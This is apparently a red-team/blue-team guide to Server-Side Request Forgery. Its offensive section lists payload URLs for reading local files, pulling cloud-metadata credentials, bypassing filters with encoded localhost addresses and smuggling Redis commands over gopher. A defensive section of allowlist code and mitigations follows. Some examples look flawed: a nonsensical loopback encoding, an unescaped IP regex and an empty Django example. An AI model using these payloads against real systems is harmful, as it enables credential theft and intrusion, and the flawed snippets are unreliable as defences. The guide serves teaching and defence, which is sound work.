Server-Side Request Forgery (SSRF) Comprehensive Guide

What is SSRF?

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make the server perform unauthorized requests on behalf of the attacker. This can be used to access internal systems, read sensitive metadata, or even pivot into private networks.

SSRF Impact Severity:

Access to internal services (databases, admin panels)
Cloud metadata exposure (AWS IAM keys, Azure tokens)
Port scanning of internal networks
Remote code execution via internal services
Bypass of firewall restrictions

Red Team Techniques (Offensive)

1. Basic SSRF Attacks

URL Fetching

http://vulnerable.com/api/fetch?url=http://attacker.com

File Protocol

http://vulnerable.com/export?template=file:///etc/passwd

2. Cloud Metadata Exploitation

AWS IMDSv1

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

Azure Metadata

http://169.254.169.254/metadata/instance?api-version=2021-02-01

3. Advanced Bypass Techniques

DNS Rebinding

http://7f000001.0x7f.1 (127.0.0.1)
http://localtest.me (resolves to 127.0.0.1)

URL Obfuscation

http://127.0.0.1:80@evil.com
http://0177.0.0.1 (Octal encoding)
http://0x7f.0x0.0x0.0x1 (Hex encoding)
http://①②⑦.⓪.⓪.① (Unicode)

4. Protocol Smuggling

Gopher Protocol

gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aPING%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$3%0d%0akey%0d%0a$5%0d%0avalue%0d%0a

SSRF to RCE

http://internal-admin-panel.local/run?cmd=id
http://127.0.0.1:8080/actuator/gateway/routes/new

5. Tools & Payloads

Detection Tools

Burp Collaborator
Interactsh
SSRF Sheriff
OOB Testing Tools

Exploitation Tools

SSRFmap
Gopherus
CloudScraper
Metabadger (AWS protection bypass)

Payload Lists

Cloud metadata endpoints
Internal service URLs
DNS rebinding domains
Alternative IP encodings

Blue Team Defenses (Defensive)

1. Input Validation

Strict Allowlisting

// Only allow specific domains
const ALLOWED_DOMAINS = ['api.trusted.com', 'cdn.safe.org'];

if (!ALLOWED_DOMAINS.includes(new URL(input).hostname)) {
  throw new Error('Domain not allowed');
}

Block Reserved Ranges

// Reject private, localhost, and cloud IPs
function isForbiddenIP(ip) {
  return ip.match(/^127.|^10.|^192.168.|^172.(1[6-9]|2[0-9]|3[0-1]).|^169.254./);
}

2. Network Controls

Egress Filtering

Restrict outbound connections
Block internal IP ranges
Implement proxy whitelisting

Cloud Protections

AWS IMDSv2 (required)
GCP metadata restrictions
Azure metadata firewall rules

3. Secure Coding Practices

Safe Libraries

Use requests with allow_redirects=False
Avoid file://, gopher://, dict://
Disable following redirects

Framework Protections

# Django SSRF Protection
from django_ssrf.protection import SSRFProtect

@SSRFProtect
def fetch_url(request):
    # Your view code

4. Monitoring & Detection

Log Analysis

Monitor for internal IP requests
Alert on metadata endpoint access
Track abnormal outbound traffic

WAF Rules

Block known SSRF patterns
Detect encoded IP addresses
Flag DNS rebinding attempts

5. Cloud-Specific Protections

AWS

Enforce IMDSv2
Use instance metadata firewall
Restrict IAM roles

Azure

Disable metadata service where unused
Use managed identities
Implement network security groups

GCP

Disable legacy metadata endpoints
Use workload identity
Restrict metadata access

Additional Resources & References

Learning Resources

Security Tools

SSRF Mitigation Checklist

Implement strict URL allowlisting
Validate and sanitize all user-supplied URLs
Block access to internal IP ranges and metadata services
Use network segmentation for sensitive backends
Enable cloud provider metadata protections (IMDSv2)
Monitor for suspicious outbound requests
Regularly test SSRF protections